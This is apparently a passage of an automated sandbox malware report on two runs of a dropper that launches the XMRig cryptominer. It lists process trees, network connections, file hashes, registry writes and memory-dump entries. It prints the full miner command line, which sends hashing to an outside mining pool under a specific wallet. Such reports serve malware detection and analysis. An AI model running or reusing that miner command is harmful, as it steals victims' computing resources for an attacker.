memory/1960-71-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-72-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-73-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-74-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-75-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-76-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-77-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-78-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-79-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-80-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-81-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-82-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-83-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
memory/1960-84-0x00007FF655BB0000-0x00007FF6566B3000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 15:56
Platform
win10v2004-20240426-en
Max time kernel
1795s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5728 wrote to memory of 1904 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5728 wrote to memory of 1904 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1904-16-0x0000020102810000-0x0000020102830000-memory.dmp
memory/1904-17-0x0000020104010000-0x0000020104030000-memory.dmp
memory/1904-18-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-19-0x0000020104030000-0x0000020104050000-memory.dmp
memory/1904-20-0x0000020104050000-0x0000020104070000-memory.dmp
memory/1904-21-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-22-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-25-0x0000020104050000-0x0000020104070000-memory.dmp
memory/1904-24-0x0000020104030000-0x0000020104050000-memory.dmp
memory/1904-23-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-26-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-27-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-28-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-29-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-30-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-31-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-32-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-33-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-34-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-35-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-36-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-37-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-38-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-39-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-40-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-41-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-42-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-43-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-44-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-45-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-46-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-47-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-48-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-49-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-50-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-51-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-52-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-53-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-54-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-55-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-56-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-57-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-58-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-59-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-60-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-61-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-62-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-63-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-64-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-65-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-66-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-67-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-68-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-69-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-70-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-71-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-72-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-73-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-74-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-75-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-76-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-77-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-78-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-79-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-80-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-81-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-82-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-83-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
memory/1904-84-0x00007FF7D2110000-0x00007FF7D2C13000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 14:45
Reported
2024-05-22 16:00
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1806s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4048 wrote to memory of 2800 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4048 wrote to memory of 2800 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.17.178.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2800-16-0x000002379E960000-0x000002379E980000-memory.dmp
memory/2800-17-0x000002379E9B0000-0x000002379E9D0000-memory.dmp
memory/2800-18-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-19-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-21-0x000002379E9F0000-0x000002379EA10000-memory.dmp
memory/2800-20-0x000002379E9D0000-0x000002379E9F0000-memory.dmp
memory/2800-22-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-23-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-24-0x000002379E9D0000-0x000002379E9F0000-memory.dmp
memory/2800-25-0x000002379E9F0000-0x000002379EA10000-memory.dmp
memory/2800-26-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-27-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-28-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-29-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-30-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-31-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-32-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-33-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-34-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-35-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-36-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-37-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-38-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-39-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-40-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-41-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-42-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-43-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-44-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-45-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-46-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-47-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-48-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-49-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-50-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-51-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-52-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-53-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-54-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-55-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-56-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-57-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-58-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-59-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-60-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-61-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-62-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-63-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-64-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-65-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-66-0x00007FF778020000-0x00007FF778B23000-memory.dmp
memory/2800-67-0x00007FF778020000-0x00007FF778B23000-memory.dmp
